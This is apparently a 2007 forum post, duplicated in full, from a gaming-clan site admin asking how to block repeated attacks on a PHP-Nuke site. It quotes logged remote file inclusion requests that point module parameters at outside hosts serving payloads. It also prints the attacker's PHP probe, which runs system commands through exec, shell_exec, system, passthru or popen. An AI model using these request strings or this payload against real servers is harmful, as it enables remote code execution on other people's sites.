darthanian
11-11-2007, 06:48 PM
I'm relatively new to website and php. I run a website for my gaming community- www.clanpraetorian.net.
I have PHP nuke running on the site with nuke sentinel. All updated etc..
and sentinel keeps blocking this ip and access here is what line is being blocked. so far I've banned/blocked 1055 of his attempts.
Get String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?
Query String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?
Post String: www.clanpraetorian.net/modules.php
That particular one comes up Germany
It's pretty obvious to me he's trying to activate this txt file for sql injection? He got me once already but i fixed the problem and he can't mess with the files. my question is how can i block the get string? or should i? I can't block his ip he's either using a proxy or moving around countries very fast :) . What i think i need is something in the htaccess file maybe?
Thanks for any help
Heres a couple of other blocks
Get String: www.clanpraetorian.net/modules.php?name=SQuery/SQuery/lib/gore.php?libpath=http://theninjalegion.com/safeon.txt??
Get String: www.clanpraetorian.net/modules.php?name=vwar//modules/vwar/admin/admin.php?vwar_root=http://65.102.222.93/safeon.txt?
Get String: www.clanpraetorian.net/modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kolortavil.org/Connections/ok.txt?
Here is txt file he is using for one site... http://www.kolortavil.org/Connections/ok.txt?
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
I have PHP nuke running on the site with nuke sentinel. All updated etc..
and sentinel keeps blocking this ip and access here is what line is being blocked. so far I've banned/blocked 1055 of his attempts.
Get String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?
Query String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?
Post String: www.clanpraetorian.net/modules.php
That particular one comes up Germany
It's pretty obvious to me he's trying to activate this txt file for sql injection? He got me once already but i fixed the problem and he can't mess with the files. my question is how can i block the get string? or should i? I can't block his ip he's either using a proxy or moving around countries very fast :) . What i think i need is something in the htaccess file maybe?
Thanks for any help
Heres a couple of other blocks
Get String: www.clanpraetorian.net/modules.php?name=SQuery/SQuery/lib/gore.php?libpath=http://theninjalegion.com/safeon.txt??
Get String: www.clanpraetorian.net/modules.php?name=vwar//modules/vwar/admin/admin.php?vwar_root=http://65.102.222.93/safeon.txt?
Get String: www.clanpraetorian.net/modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kolortavil.org/Connections/ok.txt?
Here is txt file he is using for one site... http://www.kolortavil.org/Connections/ok.txt?
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;